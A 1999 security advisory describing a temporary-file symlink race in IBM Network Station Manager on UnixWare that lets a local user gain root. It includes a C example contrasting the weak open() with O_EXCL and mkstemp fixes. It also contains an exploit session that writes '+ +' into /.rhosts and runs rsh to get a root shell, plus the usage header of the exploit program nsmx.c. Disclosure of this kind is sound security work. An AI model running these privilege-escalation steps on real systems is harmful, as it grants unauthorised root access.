IBM NetStation/UnixWare local root exploit (HTTP interface)
28 Dec. 1999
Summary
The IBM Network Station Manager is a browser-based tool for centrally administering IBM Network Stations and their users. Using the IBM Network Station Manager, the administrator can set IBM Network Station settings on a server-wide basis or on an individual user or workstation basis.
A vulnerability in IBM's Network Station Manager allows any local user to gain root privileges. This is done using a simple race condition on the temporary files used by IBM NetStation.
Credit:
The information was provided by: Brock Tellier.
A security hole exists in the way NetStation creates temporary files. Instead of using the secure-ish mktemp, NetStation merely appends the current time in seconds to a known file name. Normally, tmp races aren't a big deal for HTTP daemons since they run as nobody or similar, but NetStation must run as root to be able to open/modify files as a specific user. Thus, we can brute-force a symlink from xnec.nsu.<time> to /.rhosts and gain root.
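The temporary-file pattern described above, as an added example that is not NetStation's code: a weak open that names the file <user>.nsu.<seconds> and follows whatever symlink already sits at that name, beside two hardened alternatives (O_EXCL|O_NOFOLLOW on the same predictable name, and mkstemp with a random suffix). Function names, the scratch directory under /tmp and the fixed timestamp are constructed for the demo.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>

/* Weak pattern from the advisory: <user>.nsu.<seconds>; 'stamp' stands in for time(NULL). */
int open_tmp_predictable(const char *dir, const char *user, long stamp,
                         char *path, size_t len) {
    snprintf(path, len, "%s/%s.nsu.%ld", dir, user, stamp);
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600); /* follows a pre-placed symlink */
}

/* Minimal fix for the same name scheme: refuse (EEXIST/ELOOP) if anything is already there. */
int open_tmp_excl(const char *dir, const char *user, long stamp,
                  char *path, size_t len) {
    snprintf(path, len, "%s/%s.nsu.%ld", dir, user, stamp);
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Proper fix: unguessable suffix, created atomically (O_CREAT|O_EXCL) by mkstemp(). */
int open_tmp_mkstemp(const char *dir, const char *user, char *path, size_t len) {
    snprintf(path, len, "%s/%s.nsu.XXXXXX", dir, user);
    return mkstemp(path);
}

/* Constructed scenario: a symlink at the guessable name points at 'victim'. Returns a bitmask:
   1 = weak open wrote through the symlink, 2 = O_EXCL open refused, 4 = mkstemp succeeded. */
int run_demo(void) {
    char dir[] = "/tmp/nsmdemo.XXXXXX", victim[512], link[512], got[512];
    struct stat a, b; int fd, result = 0; long stamp = 946368000L;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/xnec.nsu.%ld", dir, stamp);
    if ((fd = open(victim, O_WRONLY | O_CREAT, 0600)) < 0) return -1;
    close(fd);
    if (symlink(victim, link) != 0) return -1;
    fd = open_tmp_predictable(dir, "xnec", stamp, got, sizeof got);
    if (fd >= 0 && fstat(fd, &a) == 0 && stat(victim, &b) == 0 &&
        a.st_ino == b.st_ino) { result |= 1; close(fd); }
    if (open_tmp_excl(dir, "xnec", stamp, got, sizeof got) < 0 &&
        (errno == EEXIST || errno == ELOOP)) result |= 2;
    if ((fd = open_tmp_mkstemp(dir, "xnec", got, sizeof got)) >= 0) {
        result |= 4; close(fd); unlink(got);
    }
    unlink(link); unlink(victim); rmdir(dir);
    return result;
}
```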
Exploit:
bash-2.02$ ls /usr/netstation/nsm/users/xnec
UX:ls: ERROR: Cannot access /usr/netstation/nsm/users/xnec: No such file or directory
Now we go to http://localhost:880, log in and click on 'Hardware -> Workstation'.
bash-2.02$ ls /usr/netstation/nsm/users/xnec
xnec.nsu xnec.usr
bash-2.02$ cc -o nsmx nsmx.c
bash-2.02$ ./nsmx
<click on Workstation again>
bash-2.02$ ls -la /.rhosts
-rwx------ 1 xnec other 0 Dec 28 06:19 /.rhosts
bash-2.02$ echo "+ +" > /.rhosts
bash-2.02$ chown root /.rhosts
bash-2.02$ rsh -l root localhost sh -I
# id
uid=0(root) gid=3(sys)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
#
/* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit
 *
 * Exploits a temporary file race condition in NetStation's HTTP interface
 *
 * To exploit: first, change the paths below to reflect your individual
 * settings/paths. Don't worry if <username>.nsu doesn't exist, NS will
 * create it for you. Next, point your browser at
 * http://localhost:880 and login as a normal user. Click on "Hardware"
 * Then "workstation". This will create <netstationdir>/users/xnec.
 * Next, compile and run this program. You only have thirty seconds from
 * the time you complete this step to then click on "Workstation". When
 * this is done, you should have an /.rhosts which you own. On some
 * UnixWare systems, you may need to chown root /.rhosts in order to do
 * rsh -l root localhost sh -i.
 *
 * Brock Tellier btellier@usa.net
 *
 */